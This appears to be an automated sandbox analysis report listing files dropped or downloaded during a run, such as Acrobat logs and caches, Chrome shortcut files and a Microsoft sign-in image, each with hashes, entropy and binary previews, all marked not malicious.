                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):246
                                    Entropy (8bit):3.5309417490522437
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:02C645B229BB2B3FC6184FF8E87311E8
                                    SHA1:70BB4D06FE20487D51EBE22B548A4A2AE106D9BA
                                    SHA-256:D077C2A7745BDC53B583E7DA86C6B1D1CE143480C30EE0067C267C8E02FCAB00
                                    SHA-512:433F7ABFE42B456191EA901719B0360CDBACA09A2D33D95F253CEF674B70D841328C295BB49E2AA456C0E0E909A7EE427B935D6F2066C890FC2A0C9D1913F7F4
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.3./.0.1./.2.0.2.5. . .0.8.:.4.3.:.2.5. .=.=.=.....
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:ASCII text, with very long lines (393)
                                    Category:dropped
                                    Size (bytes):16525
                                    Entropy (8bit):5.353642815103214
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:91F06491552FC977E9E8AF47786EE7C1
                                    SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                    SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                    SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):29752
                                    Entropy (8bit):5.417509818319948
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F04AF728CC0391B339674053BA5DC1AF
                                    SHA1:45E3ACB399D816510EFAB64883B022E3A992EAE5
                                    SHA-256:9B4CB7AAA1A9E34A628768962D59FF70A57DB5383A4C88D50B160EC296ADBF32
                                    SHA-512:393BDEBB00140833BB4D3B313463917B07A0AB53D28C4FBABA0484ADE30C8DA05D89259D2C43C1055DE186ACF5B672F1FCA58C614DAC17B3986A74E1CCD6565B
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                    Category:dropped
                                    Size (bytes):386528
                                    Entropy (8bit):7.9736851559892425
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                    Category:dropped
                                    Size (bytes):1407294
                                    Entropy (8bit):7.97605879016224
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                    SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                    SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                    SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                    Category:dropped
                                    Size (bytes):758601
                                    Entropy (8bit):7.98639316555857
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:3A49135134665364308390AC398006F1
                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                    Category:dropped
                                    Size (bytes):1419751
                                    Entropy (8bit):7.976496077007677
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A8E5C37206C98D1B655FF994A420FFB6
                                    SHA1:827237782AB5971EC205C3BCECCC7950BE9F84C3
                                    SHA-256:F1F755059AF7C2CBC36920337941AEFB18FBDB3CD14D3239CBBBCF0CB8F208EA
                                    SHA-512:12DE33EB7624458AEC44D83D4E2C09E626F8E54E177FC0C26EEBA232935F34FAAAEB71FBB025EB7C53BEA9933C46ADCE759C32516D1B80C03B6734C61D61CEB2
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 12:43:24 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2673
                                    Entropy (8bit):3.976178303752795
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:CECE562AAEDD99F55A931C920651A976
                                    SHA1:BCC5F363C6C26BB442A97216C697A4D7F1B9ED7C
                                    SHA-256:7C7C89219EA59836BB1B620E0179D8F1AB86341244C9C3B5794411940213026E
                                    SHA-512:A6F52F3090667F130A349526C517EEAA1C9FC0D62DD54136E821B66A97016087C87294A3FD174DDAB78779032EF64B6133F7B3600A65BBA541EDF5E47F5B485C
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,....H....e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Zmm...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 12:43:24 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2675
                                    Entropy (8bit):3.991518486812015
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:75AC98D1BBAC5944C80869EE19CCE6A7
                                    SHA1:62925E9D54CCC73E5D2EBE3577BCA2955E26E34F
                                    SHA-256:627B7639B8A867394F6D369AF053931E958F58E4DE05620B1A3585A070ADB951
                                    SHA-512:B6F6CFC305232F27F7C24E662461A192B37446FF11C1FDB07417AF1DD4CFCA348737A601D8FC5119B89950FBE9AB4C26D7A1FC1A9F2D9EB0C2FFA2B07A9A183B
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.........e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Zmm...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2689
                                    Entropy (8bit):4.005114261080799
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:36380BCAD91305B1CAB7A26C57BDE684
                                    SHA1:1425A13EDE5013AA045C05EA407C771F2815FA04
                                    SHA-256:119F390EBEC6B1242A6DDBD8FCEB07CAE194205695A24DB112988BAE2D89CF69
                                    SHA-512:352776AD3B24757E4E85F40BC82E85D1432D44202343120BACBEE5F778279D927090A7D15BFB3908962BBA6725EC7A50020FF308DED6886FE70683ED81759662
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 12:43:24 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.9920168581113815
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A096AC1748A88BE57DC193CA86EA6338
                                    SHA1:3F88896FD094EBB17CAFAEC431A1BA838BBF0A94
                                    SHA-256:06942BBBFCD3E1DD4203F1B0A672F4966253B2CE10819B06CA14476BBFFE3564
                                    SHA-512:CB5DC37E289014FF065B11784EAAF9A5500DC52C23F0D9A1A97C6104D37769E18108CBB20B2DEDDD00F1169F95BACBFE2F1E93C398000BC909A493045236CC6D
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,....}....e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Zmm...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 12:43:24 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.980628336483444
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:B774563782A73352EAE61FC07337FF8F
                                    SHA1:C0488B5C21CFB88A5A88A96682B44C0D3011EDDF
                                    SHA-256:F879869C4003FF660CD373CA64878103D563208EEF907B2480A85E7004C7A55D
                                    SHA-512:494CC0CAC25F76E4C44261F09AC6A78DE4487697F25B8A8E4831574E46D135D9FF4BB7403014564B170D9A2364AF01A5EF5B1F143F308696FA86AFB5F72B5A07
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,........e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Zmm...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 12:43:24 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):3.9865540272464064
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4B9BF3C6658EFA99A147D0037ADB007D
                                    SHA1:494B770E82703D9FC18D680FABB5FF5D2032EEB9
                                    SHA-256:4DAE72AF69F16F2A10FE4ECBC137A455E55E6538D54EBBD48B34F8E9BA50EE25
                                    SHA-512:1E4707EF3F80831E514F7574F935023E306D93643E88035EB6E8D0666F90360669D12C3786E6AFDC8F80383F70629FE2443B8612316949A37E2FE69F8900B45E
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:L..................F.@.. ...$+.,....kM...e..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I-ZYm....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V-Zkm....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V-Zkm....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V-Zkm..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V-Zmm...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............Z.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                    Category:downloaded
                                    Size (bytes):621
                                    Entropy (8bit):7.673946009263606
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:4761405717E938D7E7400BB15715DB1E
                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):32
                                    Entropy (8bit):4.390319531114783
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:EB3CE3190D8A58E048D35E620747D3A5
                                    SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                    SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                    SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                    Malicious:false
                                    Reputation:unknown
